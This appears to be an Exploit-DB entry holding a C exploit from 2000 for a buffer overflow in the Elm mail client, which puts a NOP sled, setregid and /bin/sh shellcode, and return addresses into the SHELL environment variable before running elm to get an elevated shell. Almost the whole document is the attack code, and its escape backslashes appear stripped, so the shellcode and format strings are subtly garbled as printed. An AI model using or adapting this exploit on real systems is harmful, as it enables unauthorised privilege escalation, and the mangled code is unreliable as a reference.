https://www.exploit-db.com/exploits/19972

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/1276/info
 
Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix). 

/* 
  Elm 2.5 PL3 exploit 
  Tested Under Linux Slackware 3.6, 4.0, 7.0
  By xfer ([email protected])
  Of Buffer0verfl0w Security
  At Sat May 27 18:52:14 CEST 2000
  HowTo: Hmmm.. Ya have to play with offset.
  MoreInfo: Elm is shit, it has bug in each option or function ;>.
*/ 
#include <stdio.h>
#include <unistd.h>
#define PATH "/usr/local/bin/elm"
#define BUFFER 256
#define NOP 0x90
                   /* setregid + generic shell code */
char shellcode[] = "x31xdbx31xc9xbbxffxffxffxffxb1x0cx31xc0xb0"
                   "x47xcdx80x31xdbx31xc9xb3x0cxb1x0cx31xc0xb0"
		   "x47xcdx80xebx1fx5ex89x76x08x31xc0x88x46x07"
		   "x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcd"
		   "x80x31xdbx89xd8x40xcdx80xe8xdcxffxffxffx2f"
		   "x62x69x6ex2fx73x68";
unsigned long get_esp(void) {
  __asm__("movl %esp, %eax"); 
}
int main(int argc,char *argv[]){
 char buff[BUFFER];
 int x,offset=0;
 long address;
 if(argc>1) offset=atoi(argv[1]);
 address = get_esp() + offset;
 fprintf(stderr,"Address: 0x%lxnOffset: %dnShellSize: %dn",address,offset,strlen(shellcode));
 for(x=3;x<BUFFER;x+=4) *(int *)&buff[x]=address;
 for(x=0;x<(BUFFER-strlen(shellcode));x++) buff[x]=NOP;
 memcpy(buff+(BUFFER-strlen(shellcode)),shellcode,strlen(shellcode));
 setenv("SHELL",buff,1);
 if((execl(PATH,"elm",0)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?n",PATH);
 return 0;
}